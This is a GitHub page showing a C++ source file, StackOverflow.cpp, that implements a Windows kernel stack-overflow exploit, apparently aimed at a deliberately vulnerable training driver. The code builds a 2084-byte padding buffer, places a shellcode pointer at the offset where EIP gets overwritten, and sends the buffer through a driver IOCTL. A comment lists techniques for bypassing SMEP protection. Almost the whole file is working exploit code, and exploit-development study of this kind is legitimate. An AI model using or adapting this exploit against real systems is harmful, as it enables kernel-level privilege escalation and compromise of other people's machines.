-
-
Notifications
You must be signed in to change notification settings - Fork 18
/
StackOverflow.cpp
44 lines (35 loc) · 1.29 KB
/
StackOverflow.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#include "StackOverflow.h"
bool
ExploitStackOverflow::exploit() {
static const size_t Buffer_Size = 2084;
static const size_t EIP_Overwrite_Offset = 2080;
/*
* This won't work since Windows 8.0 / Intel Ivy Bridge (those after 2011: i3, i5, i7, and so on)
* processors due to CR4.SMEP (Supervisor Mode Execution Prevention) feature preventing
* Ring0 code executing code located within user-mode memory pages.
* Can be bypassed in the following ways:
* - Return Oriented Programming
* - modifying nt!MmUserProbeAddress (equivalent of addr_limit with ULONG_MAX on Linux)
* - using Reserve Objects of Windows 7, allocate, execute user-controlled 16 bytes to
* clear-out the CR4.SMEP bit and then jump to the payload in user-mode memory.
* - jumping to Kernel Heap on x86
- -
**/
auto shellcodePointer = adjustPayloadEpilogue(8, true);
shared_ptr<UCHAR> buffer(
new UCHAR[Buffer_Size]
);
if(!buffer) {
wcerr << L"[!] Could not allocate buffer for input payload." << endl;
return false;
}
memset(buffer.get(), 'A', Buffer_Size);
*(reinterpret_cast<DWORD*>(&buffer.get()[EIP_Overwrite_Offset])) =
reinterpret_cast<DWORD>(*shellcodePointer);
bool ret = driver.SendIOCTL (
ExploitStackOverflow::Ioctl_Code,
buffer.get(),
Buffer_Size
);
return ret;
}